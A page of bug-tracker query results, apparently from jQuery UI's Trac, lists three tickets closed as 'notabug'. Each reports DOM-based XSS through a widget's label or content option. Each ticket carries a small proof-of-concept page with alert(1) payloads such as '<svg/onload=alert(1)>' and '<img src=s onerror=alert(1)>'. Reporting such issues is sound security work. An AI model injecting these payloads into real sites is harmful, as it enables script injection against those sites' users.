Custom Query (7249 matches)
Results (28 - 30 of 7249)
| Ticket | Resolution | Summary | Owner | Reporter |
|---|---|---|---|---|
| #15201 | notabug | Button widget, label attribute DOM based XSS | ||
| Description |
Proof of concept: <link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<button>Button label</button>
<script>
$( "button" ).button({
label: "<svg/onload=alert(1)>"
});
</script>
|
|||
| #15200 | notabug | Checkboxradio widget, label attribute DOM based XSS | ||
| Description |
Proof of concept: <link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<fieldset>
<legend>Select a Location: </legend>
<label for="radio-1">New York</label>
<input type="radio" name="radio-1" id="radio-1">
<label for="radio-2">Paris</label>
<input type="radio" name="radio-1" id="radio-2">
<label for="radio-3">London</label>
<input type="radio" name="radio-1" id="radio-3">
</fieldset>
<script>
$( "input[type='radio']" ).checkboxradio({
label: "<svg/onload=alert(1)>"
});
</script>
|
|||
| #15199 | notabug | input widget, content argument DOM based XSS | ||
| Description |
Proof of concept: <link rel="stylesheet" href="//code.jquery.com/ui/1.12.0/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<input title="Input help">
<script>
$( document ).tooltip({
content: "<img src=s onerror=alert(1)>"
});
</script>
|
|||
Note: See TracQuery
for help on using queries.